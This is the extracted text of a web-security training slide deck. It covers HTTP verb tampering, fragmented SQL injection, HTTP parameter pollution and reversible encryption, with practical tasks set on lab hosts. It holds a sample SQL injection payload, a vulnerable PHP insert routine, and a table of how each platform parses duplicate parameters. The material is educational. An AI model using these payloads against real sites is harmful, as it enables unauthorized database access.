Vulnerabilities in Web – difficulties

(masterclass)

Greetings

Questions to discuss

•HTTP Verb Tampering

• Fragmented SQL Injections

•HTTP Parameter Pollution

•Reversed encryption

HTTP Verb Tampering

HTTP Verb Tampering is an error in access control for HTTP methods.

•Administration error

•Particular case – vendor’s error

HTTP Verb Tampering

What’s the method?

HTTP Verb Tampering

Why?

HTTP Verb Tampering

Exploitation

• Real-live example (Jboss Auth Bypass)

HTTP Verb Tampering

Exploitation

• Practical task http://stat.local/

.htaccess file Result of GET request

Result of HACK request

Fragmented SQL Injections

SQL injection is an vulnerability caused by incorrect input data application

processing. User data transferred via web applications are changed to modify

SQL request used for exploitation.

•Insufficient data filtering

Fragmented SQL Injections

What’s the method?

Do not forget correct filtering!

Structure of a valid request (MySQL database)

INSERT INTO table1 (c1,c2) VALUES (‘value1’,’value2’);

Here is a valid request with injected SQL commands

INSERT INTO table1 (c1,c2) VALUES (‘a\’ , ’, user()); -- 1’);

Fragmented SQL Injections

Why?

If there is no filtering for back slash (“\”), an attacker can screen the next symbol by a single or double quote in database request, that do not allow to interpret it as a line termination symbol.

The following is required for vulnerability exploitation:the request should include more than one string variable.

Remember: it’s necessary to filter not only user data, but also data received from databases.

Fragmented SQL Injections

Exploitation

• Real-life example (Coppermine Photo Gallery <= 1.4.19)

GET,POST,REQUEST – “\” symbol is not filtered.

You can specify “\” in email parameter.

Exploitation is possible via a child request to database when you try to access

system features after authorization.

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/index.php

«Bug tracking system for source code».

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/add.php

Vulnerable code (add.php file):

if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");}

Database request looks as follows:INSERT INTO track (bug,fix) VALUES (‘value1’,’value2’);

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/add.php

Vulnerable code (add.php file):

if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");}

Database request looks as follows:INSERT INTO track (bug,fix) VALUES (‘value1\’, ’, user()) – 1’);

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/view.php

Vulnerable code (add.php file):

if (isset($_POST['code']) && isset($_POST['fix'])) { $code=htmlspecialchars($_POST['code']); $fix=htmlspecialchars($_POST['fix']); …. mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");}

As a result, fix column in track table contents a value that is user() function result.

HTTP Parameter Pollution

HTTP Parameter Pollution is a vulnerability caused by a situation that

different platforms (web server and web application language) process

sequence of HTTP request parameters with the same names differently.

HTTP Parameter Pollution

Technology/Environment Interpretation of parameters Example

ASP.NET/IIS Binding via comma par1=val1,val2

ASP/IIS Binding via comma par1=val1,val2

PHP/APACHE Последний параметр результирующий par1=val2

PHP/Zeus Last parameter includes result par1=val2

JSP, Servlet/Apache Tomcat First parameter includes result par1=val1

JSP,Servlet/Oracle Application Server 10g First parameter includes result par1=val1

JSP,Servlet/Jetty First parameter includes result par1=val1

IBM Lotus Domino Первый параметр результирующий par1=val1

IBM HTTP Server Last parameter includes result par1=val2

mod_perl,libapeq2/Apache First parameter includes result par1=val1

Perl CGI/Apache First parameter includes result par1=val1

mod_perl/Apache First parameter includes result par1=val1

mod_wsgi (Python)/Apache Returns an array ARRAY(0x8b9058c)

Pythin/Zope First parameter includes result par1=val1

IceWarp Returns an array ['val1','val2']

AXIS 2400 Last parameter includes result par1=val2

Linksys Wireless-G PTZ Internet Camera Binding via comma par1=val1,val2

Ricoh Aficio 1022 Printer Last parameter includes result par1=val2

webcamXP Pro First parameter includes result par1=val1

DBMan Binding via 2 tildes par1=val1~~val2

HTTP Parameter Pollution

According to PHP web application language.

An interesting variable variables_order in php.ini configuration file (establishes variable processing).

Why is it interesting?

GET /?id=1Cookie: id=2

В итоге:

$_GET[‘id’]=1$_REQUEST[‘id’]=2

The frequent error in request processing:$_GET is checked, but the value is assigned to from $_REQUEST.

HTTP Parameter Pollution

Exploitation

• Real-life example (www.blogger.com blog service)

Vulnerability as a part of «Rewarding web application security

research» program

Error in input setting processing – the first suitable value is checked but

result includes the last one.

Supposedly, vulnerability is in QUERY_STRING check and then in variable

declaration made via array data received in the request.

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/index.php

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/register.php

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/invite.php

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/invite.php

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/invite.phpgpc_order (php.ini) – “GPC”

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/add.php

Reversible Encryption

Reversible encryption in web applications is possibly insecure as it can be

used by attackers in:

•Exploitation of SQL Injection vulnerability;

•Information disclosure (database dump);

•Arbitrary file reading;

•and so on.

Reversible Encryption

Exploitation

• Practical task

http://portal.local

Reversible Encryption

Exploitation

• Practical task

http://portal.local

Reversible Encryption

Exploitation

• Practical task

http://portal.local

Reversible Encryption

Exploitation

• Practical task

http://portal.local/news.php

Reversible Encryption

Exploitation

• Practical task

http://portal.local/news.php

Reversible Encryption

Exploitation

• Practical task

http://portal.local/news.php

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

http://portal.local/xor_tool/

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

FAILED.

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

1. “test” user with “12345678910qwerty” password

2. test : UFBQR1FQRk9cQ0QIFgcRBx0=

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

http://portal.local/xor_tool/

Instead of conclusions

What’s next?

Try to do practical tasks

Take part in competitions

Thank you for your attention!

Questions?

ygoltsev@ptsecurity.ru